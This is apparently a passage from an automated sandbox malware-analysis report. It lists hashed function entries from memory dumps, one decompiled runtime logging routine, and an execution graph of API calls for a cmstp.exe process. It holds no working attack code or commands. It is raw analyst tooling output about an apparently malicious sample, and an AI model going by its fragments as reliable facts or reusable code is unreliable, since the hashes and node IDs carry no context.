                        • Opcode Fuzzy Hash: 79ad8dd788f8ff5071b60d11781a69a5621074769a57d322bba0fdf3445dff3b
                        • Instruction Fuzzy Hash: F9900271301000579901A69A5804A5F41159BF4741B91D115E4004534C859588E26571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49730, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8ba1782c09db60dd9fa240958f06cf37cbff3d97eab7a3029143f668a9c7e34c
                        • Instruction ID: 8bfa9ad00c2c83b6a79e72f93ec5096d7a3328ba9c572915d3cace59d93e2ed2
                        • Opcode Fuzzy Hash: 8ba1782c09db60dd9fa240958f06cf37cbff3d97eab7a3029143f668a9c7e34c
                        • Instruction Fuzzy Hash: FE90026160500407D541715A541871B00259BD4641F91D111E0014534DC69A8AD67AF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED495D0, Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 277df87477a000b4e7019dbee185879771bf6b131e1f98825f6c0c81e5524ee7
                        • Instruction ID: 100a06e4f36de7ceb7e4884b2c30dafbc5e51aa9eecf9e37933fbfbc7b9089c8
                        • Opcode Fuzzy Hash: 277df87477a000b4e7019dbee185879771bf6b131e1f98825f6c0c81e5524ee7
                        • Instruction Fuzzy Hash: 079002A1202000074506715A441462B401A9BE4641B91C121E1004570DC56688D27575
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED495F0, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6395493ac28491f1f0d1dec85a8fa7e4cb718ac4eebf03cf91752ec5dd22100f
                        • Instruction ID: e0190aeadba0218ccfd39d02b9f74bfd6741c60a68ab940c2c30d6b761adb22c
                        • Opcode Fuzzy Hash: 6395493ac28491f1f0d1dec85a8fa7e4cb718ac4eebf03cf91752ec5dd22100f
                        • Instruction Fuzzy Hash: FC90027120100807D505615A480469B00159BD4741F91C111E6014635E96A688D27571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49560, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7bb15dbbdc282774f5021f0600585c92de4760953f49a38d227e45f8021d4d9d
                        • Instruction ID: f02f77a6b83b98159ccad1bc8d0acac38cb431af292cf83912802cad4ed9513e
                        • Opcode Fuzzy Hash: 7bb15dbbdc282774f5021f0600585c92de4760953f49a38d227e45f8021d4d9d
                        • Instruction Fuzzy Hash: 9E900265221000070546A55A060451F0455ABDA7913D1C115F1406570CC66288E66771
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4AD30, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15e3bb110b37821ef1431fc432f7a8a2d4fe924a313a8341a1f0a4325380ff45
                        • Instruction ID: 308780407945451ee0bb7a9a9b7a0f99c8af453ebb42dfac51c9c4bc33e807a2
                        • Opcode Fuzzy Hash: 15e3bb110b37821ef1431fc432f7a8a2d4fe924a313a8341a1f0a4325380ff45
                        • Instruction Fuzzy Hash: 64900271A05000179541715A481465B4016ABE4B81B95C111E0504534C89958AD667F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49520, Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da6b95dab155cd625c4c2226a72ed5bbc9a7f28849f76c4b986a5208670f1301
                        • Instruction ID: eb6ed7e974a40551a427838bc216dafdbdb222ce69182c8a31d3196de2b07bd0
                        • Opcode Fuzzy Hash: da6b95dab155cd625c4c2226a72ed5bbc9a7f28849f76c4b986a5208670f1301
                        • Instruction Fuzzy Hash: 659002E1201140974901A25A8404B1F45159BE4641B91C116E1044530CC56688D2A575
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49A80, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a8e918a3b3ea165e4474d358766a25281235c586917aceff72f835b2f979f42
                        • Instruction ID: 223d3deca62d032b0fcbcd3da9ef8b1ab86a74dea4b243dc908b429ea4170f59
                        • Opcode Fuzzy Hash: 4a8e918a3b3ea165e4474d358766a25281235c586917aceff72f835b2f979f42
                        • Instruction Fuzzy Hash: 5390026120144447D541625A4804B1F41159BE5642FD1C119E4146534CC95688D66B71
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49A10, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95bac8f1ed3398570797c52999626e7342e126d7c7aad8ca982e066820025409
                        • Instruction ID: b6021c7361a7b9341de60817479eb9673d5f40f702c8956d6b01c4188de38387
                        • Opcode Fuzzy Hash: 95bac8f1ed3398570797c52999626e7342e126d7c7aad8ca982e066820025409
                        • Instruction Fuzzy Hash: 3A90027120140407D501615A480875B00159BD4742F91C111E5154535E86A6C8D27971
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4A3B0, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d4769439317e6740ae55a14bcf60905a292d575b674271d31b32d23c597f04
                        • Instruction ID: 45835d94e28adc621ce4bfa2d135b010979dbe4e62f652324e929e3cd6494418
                        • Opcode Fuzzy Hash: e6d4769439317e6740ae55a14bcf60905a292d575b674271d31b32d23c597f04
                        • Instruction Fuzzy Hash: 0490027120144007D541715A844461F5015ABE4741F91C511E0415534C865688D7A671
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49B00, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8272f9ff9fdbf2bdefa762f021625eebfb26a3eee7d6ded2666db7917840ec57
                        • Instruction ID: 1d93397d34a2bc825a66ca15cc79e503a0c793b7fed5f44f56676bd023ebcbb5
                        • Opcode Fuzzy Hash: 8272f9ff9fdbf2bdefa762f021625eebfb26a3eee7d6ded2666db7917840ec57
                        • Instruction Fuzzy Hash: C290026124100807D541715A841471B0016DBD4A41F91C111E0014534D865789E67AF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED498A0, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdf60d4170c12ac8d197bca9c2c3902dedd2eebef5a624586b6e89f5c366d9a8
                        • Instruction ID: 47d211e0fcdce10436012da7c6a4039eed9d87f71ea9299f78deff061a2f0952
                        • Opcode Fuzzy Hash: fdf60d4170c12ac8d197bca9c2c3902dedd2eebef5a624586b6e89f5c366d9a8
                        • Instruction Fuzzy Hash: 6A90026130100407D503615A441461B0019DBD5785FD1C112E1414535D866689D3B572
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4B040, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 087e0df053877c78f59ecbdf54fc9ce1c20274eaead5a4d76c7d01cc5cdc05c1
                        • Instruction ID: 283bbbc327367069fe1e83cad5976994eee51c20fb673e1f7058811856147240
                        • Opcode Fuzzy Hash: 087e0df053877c78f59ecbdf54fc9ce1c20274eaead5a4d76c7d01cc5cdc05c1
                        • Instruction Fuzzy Hash: 139002A1601140474941B15A480441B5025ABE57413D1C221E0444530C86A988D6A6B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49820, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84716a340bb8de34f1bfdbae646c811540d2b0321e0441fb1918cd0b59c45617
                        • Instruction ID: a9b7e2249cff49935c09693839b6beed0479636276032017312a3526a8f67044
                        • Opcode Fuzzy Hash: 84716a340bb8de34f1bfdbae646c811540d2b0321e0441fb1918cd0b59c45617
                        • Instruction Fuzzy Hash: A790027124100407D542715A440461B0019ABD4681FD1C112E0414534E86968AD7BEB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED499D0, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c3c097e83a826122ac6720d1f10a599ff0163f10e1d5e5118f4ca301af78258b
                        • Instruction ID: 939ad45f05c615c5db93929c04c00424b4e93a4431b787a1e0baddb0d10fdb8a
                        • Opcode Fuzzy Hash: c3c097e83a826122ac6720d1f10a599ff0163f10e1d5e5118f4ca301af78258b
                        • Instruction Fuzzy Hash: 429002A121100047D505615A440471B00559BE5641F91C112E2144534CC56A8CE26575
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49950, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bcaf43279973ec3750fff93e6d13540af725ac19b451831001d7ca9f56b0c4e
                        • Instruction ID: 93869a2eebba3dc174f6b5ed6b1b25fbf57a4deda84daa3a62e1d553bdd604f9
                        • Opcode Fuzzy Hash: 9bcaf43279973ec3750fff93e6d13540af725ac19b451831001d7ca9f56b0c4e
                        • Instruction Fuzzy Hash: DE9002A120140407D541655A480461B00159BD4742F91C111E2054535E8A6A8CD27575
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED49670, Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction ID: fe218b1a8dfde410d8d519e142a9f792e155348614521ce586238253635a69a2
                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E1ED9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1ED4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1ED95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1ED95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                        0x1ed9fdda
                        0x1ed9fde2
                        0x1ed9fde5
                        0x1ed9fdec
                        0x1ed9fdfa
                        0x1ed9fdff
                        0x1ed9fe0a
                        0x1ed9fe0f
                        0x1ed9fe17
                        0x1ed9fe1e
                        0x1ed9fe19
                        0x1ed9fe19
                        0x1ed9fe19
                        0x1ed9fe20
                        0x1ed9fe21
                        0x1ed9fe22
                        0x1ed9fe25
                        0x1ed9fe40

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1ED9FDFA
                        Strings
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1ED9FE01
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1ED9FE2B
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: 10e92d44dc8e608059ee6314cad7680d63b8124afdf8df60b35aa2385f409a79
                        • Instruction ID: 546e5ac1c8b386dddac4584aaeda1bcac3af2b61ed068f86f8e53da8eda9d4e3
                        • Opcode Fuzzy Hash: 10e92d44dc8e608059ee6314cad7680d63b8124afdf8df60b35aa2385f409a79
                        • Instruction Fuzzy Hash: 20F0F036600141BFEB240A56DC01F67BB6BEB44730F240324FA28566E1EA62F960A7F0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: cmstp.exe PID: 3504 Parent PID: 3440 cmstp.exeCOMMON

                        Execution Graph

                        Execution Coverage:6.8%
                        Dynamic/Decrypted Code Coverage:1.6%
                        Signature Coverage:0%
                        Total number of Nodes:1132
                        Total number of Limit Nodes:144

                        Graph

                        execution_graph 33723 4819540 LdrInitializeThunk 33724 649090 33727 6490cb 33724->33727 33735 64bd50 33724->33735 33726 6491ac 33727->33726 33739 63acf0 33727->33739 33729 649101 33744 644e50 33729->33744 33731 64911d 33731->33726 33732 649130 Sleep 33731->33732 33749 648cb0 LdrLoadDll 33731->33749 33750 648ec0 LdrLoadDll 33731->33750 33732->33731 33736 64bd5d 33735->33736 33751 64a550 33736->33751 33738 64bd7d 33738->33727 33741 63ad14 33739->33741 33740 63ad1b 33740->33729 33741->33740 33742 63ad50 LdrLoadDll 33741->33742 33743 63ad67 33741->33743 33742->33743 33743->33729 33745 644e6a 33744->33745 33746 644e5e 33744->33746 33745->33731 33746->33745 33758 6452d0 LdrLoadDll 33746->33758 33748 644fbc 33748->33731 33749->33731 33750->33731 33752 64a56c NtAllocateVirtualMemory 33751->33752 33754 64af70 33751->33754 33752->33738 33755 64af80 33754->33755 33757 64afa2 33754->33757 33756 644e50 LdrLoadDll 33755->33756 33756->33757 33757->33752 33758->33748 33759 64f23d 33762 64b9e0 33759->33762 33763 64ba06 33762->33763 33770 639d40 33763->33770 33765 64ba12 33766 64ba36 33765->33766 33778 638f30 33765->33778 33816 64a6c0 33766->33816 33819 639c90 33770->33819 33772 639d4d 33773 639d54 33772->33773 33831 639c30 33772->33831 33773->33765 33779 638f57 33778->33779 34275 63b1c0 33779->34275 33781 638f69 34279 63af10 33781->34279 33783 638f86 33789 638f8d 33783->33789 34372 63ae40 LdrLoadDll 33783->34372 33786 638ffc 34295 63f410 33786->34295 33788 639006 33790 64bfa0 2 API calls 33788->33790 33812 6390f2 33788->33812 33789->33812 34283 63f380 33789->34283 33791 63902a 33790->33791 33792 64bfa0 2 API calls 33791->33792 33793 63903b 33792->33793 33794 64bfa0 2 API calls 33793->33794 33795 63904c 33794->33795 34307 63ca90 33795->34307 33797 639059 33798 644a50 10 API calls 33797->33798 33799 639066 33798->33799 33800 644a50 10 API calls 33799->33800 33801 639077 33800->33801 33802 6390a5 33801->33802 33803 639084 33801->33803 33804 644a50 10 API calls 33802->33804 34373 63d620 12 API calls 33803->34373 33811 6390c1 33804->33811 33806 63908b 34374 63cc00 LdrLoadDll 33806->34374 33807 6390e9 34355 638d00 33807->34355 33810 639092 33813 638d00 28 API calls 33810->33813 33811->33807 34317 63d6c0 33811->34317 33812->33766 33815 63909b 33813->33815 33815->33766 33817 64af70 LdrLoadDll 33816->33817 33818 64a6df 33817->33818 33850 648bd0 33819->33850 33823 639cb6 33823->33772 33824 639cac 33824->33823 33857 64b2c0 33824->33857 33826 639cf3 33826->33823 33868 639ab0 33826->33868 33828 639d13 33874 639620 LdrLoadDll 33828->33874 33830 639d25 33830->33772 33832 639c4a 33831->33832 33833 64b5b0 LdrLoadDll 33831->33833 34254 64b5b0 33832->34254 33833->33832 33836 64b5b0 LdrLoadDll 33837 639c71 33836->33837 33838 63f180 33837->33838 33839 63f199 33838->33839 34258 63b040 33839->34258 33841 63f1ac 34262 64a1f0 33841->34262 33845 63f1d2 33846 63f1fd 33845->33846 34268 64a270 33845->34268 33848 64a4a0 2 API calls 33846->33848 33849 639d65 33848->33849 33849->33765 33851 648bdf 33850->33851 33852 644e50 LdrLoadDll 33851->33852 33853 639ca3 33852->33853 33854 648a80 33853->33854 33875 64a610 33854->33875 33858 64b2d9 33857->33858 33879 644a50 33858->33879 33860 64b2f1 33861 64b2fa 33860->33861 33918 64b100 33860->33918 33861->33826 33863 64b30e 33863->33861 33936 649f10 33863->33936 34232 637ea0 33868->34232 33870 639ad1 33870->33828 33871 639aca 33871->33870 34245 638160 33871->34245 33874->33830 33876 64a61c 33875->33876 33877 64af70 LdrLoadDll 33876->33877 33878 648a95 33877->33878 33878->33824 33880 644d85 33879->33880 33882 644a64 33879->33882 33880->33860 33882->33880 33944 649c60 33882->33944 33884 644b90 33947 64a370 33884->33947 33885 644b73 34051 64a470 LdrLoadDll 33885->34051 33888 644bb7 33890 64bdd0 2 API calls 33888->33890 33889 644b7d 33889->33860 33893 644bc3 33890->33893 33891 644d49 33894 64a4a0 2 API calls 33891->33894 33892 644d5f 34016 644790 33892->34016 33893->33889 33893->33891 33893->33892 33898 644c52 33893->33898 33895 644d50 33894->33895 33895->33860 33897 644d72 33897->33860 33899 644cb9 33898->33899 33901 644c61 33898->33901 33899->33891 33900 644ccc 33899->33900 34004 64a2f0 33900->34004 33903 644c66 33901->33903 33904 644c7a 33901->33904 34052 644650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33903->34052 33906 644c97 33904->33906 33907 644c7f 33904->33907 33906->33895 33962 644410 33906->33962 33950 6446f0 33907->33950 33909 644c70 33909->33860 33913 644c8d 33913->33860 33916 644caf 33916->33860 33917 644d38 33917->33860 33919 64b111 33918->33919 33920 64b123 33919->33920 33921 64bd50 2 API calls 33919->33921 33920->33863 33922 64b144 33921->33922 34076 644070 33922->34076 33924 64b190 33924->33863 33925 64b167 33925->33924 33926 644070 3 API calls 33925->33926 33929 64b189 33926->33929 33928 64b21a 33930 64b22a 33928->33930 34202 64af10 LdrLoadDll 33928->34202 33929->33924 34108 645390 33929->34108 34118 64ad80 33930->34118 33933 64b258 34197 649ed0 33933->34197 33937 64af70 LdrLoadDll 33936->33937 33938 649f2c 33937->33938 34225 481967a 33938->34225 33939 649f47 33941 64bdd0 33939->33941 33942 64b369 33941->33942 34228 64a680 33941->34228 33942->33826 33945 64af70 LdrLoadDll 33944->33945 33946 644b44 33945->33946 33946->33884 33946->33885 33946->33889 33948 64a38c NtCreateFile 33947->33948 33949 64af70 LdrLoadDll 33947->33949 33948->33888 33949->33948 33951 64470c 33950->33951 33952 64a2f0 LdrLoadDll 33951->33952 33953 64472d 33952->33953 33954 644734 33953->33954 33955 644748 33953->33955 33956 64a4a0 2 API calls 33954->33956 33957 64a4a0 2 API calls 33955->33957 33958 64473d 33956->33958 33959 644751 33957->33959 33958->33913 34053 64bfe0 LdrLoadDll RtlAllocateHeap 33959->34053 33961 64475c 33961->33913 33963 64448e 33962->33963 33964 64445b 33962->33964 33966 6445d9 33963->33966 33970 6444aa 33963->33970 33965 64a2f0 LdrLoadDll 33964->33965 33968 644476 33965->33968 33967 64a2f0 LdrLoadDll 33966->33967 33974 6445f4 33967->33974 33969 64a4a0 2 API calls 33968->33969 33971 64447f 33969->33971 33972 64a2f0 LdrLoadDll 33970->33972 33971->33916 33973 6444c5 33972->33973 33976 6444e1 33973->33976 33977 6444cc 33973->33977 33975 64a330 2 API calls 33974->33975 33978 64462e 33975->33978 33980 6444e6 33976->33980 33981 6444fc 33976->33981 33979 64a4a0 2 API calls 33977->33979 33982 64a4a0 2 API calls 33978->33982 33983 6444d5 33979->33983 33984 64a4a0 2 API calls 33980->33984 33989 644501 33981->33989 34054 64bfa0 33981->34054 33985 644639 33982->33985 33983->33916 33986 6444ef 33984->33986 33985->33916 33986->33916 33997 644513 33989->33997 34057 64a420 33989->34057 33990 644567 33991 64457e 33990->33991 34065 64a2b0 LdrLoadDll 33990->34065 33992 644585 33991->33992 33993 64459a 33991->33993 33995 64a4a0 2 API calls 33992->33995 33996 64a4a0 2 API calls 33993->33996 33995->33997 33998 6445a3 33996->33998 33997->33916 33999 6445cf 33998->33999 34060 64bba0 33998->34060 33999->33916 34001 6445ba 34002 64bdd0 2 API calls 34001->34002 34003 6445c3 34002->34003 34003->33916 34005 64af70 LdrLoadDll 34004->34005 34006 644d14 34004->34006 34005->34006 34007 64a330 34006->34007 34008 64a346 34007->34008 34009 64af70 LdrLoadDll 34008->34009 34010 64a34c 34009->34010 34069 4819770 LdrInitializeThunk 34010->34069 34011 644d2c 34013 64a4a0 34011->34013 34014 64af70 LdrLoadDll 34013->34014 34015 64a4bc NtClose 34014->34015 34015->33917 34017 6447a6 34016->34017 34018 64a2f0 LdrLoadDll 34017->34018 34019 6447ce 34018->34019 34020 6447d7 34019->34020 34025 6447ec 34019->34025 34021 64a4a0 2 API calls 34020->34021 34024 6447e0 34021->34024 34022 644810 34026 64a3d0 2 API calls 34022->34026 34023 64485a 34027 64485f 34023->34027 34028 6448a0 34023->34028 34024->33897 34025->34022 34025->34023 34029 644835 34026->34029 34027->34024 34030 64a420 2 API calls 34027->34030 34031 6448b2 34028->34031 34036 6449da 34028->34036 34032 64a4a0 2 API calls 34029->34032 34033 64488a 34030->34033 34034 6448b7 34031->34034 34045 6448f2 34031->34045 34032->34024 34035 64a4a0 2 API calls 34033->34035 34037 64a3d0 2 API calls 34034->34037 34038 644893 34035->34038 34036->34024 34040 64a420 2 API calls 34036->34040 34039 6448da 34037->34039 34038->33897 34041 64a4a0 2 API calls 34039->34041 34044 644a31 34040->34044 34042 6448e3 34041->34042 34042->33897 34047 64a4a0 2 API calls 34044->34047 34045->34024 34070 64a3d0 34045->34070 34049 644a3a 34047->34049 34048 64a4a0 2 API calls 34050 644925 34048->34050 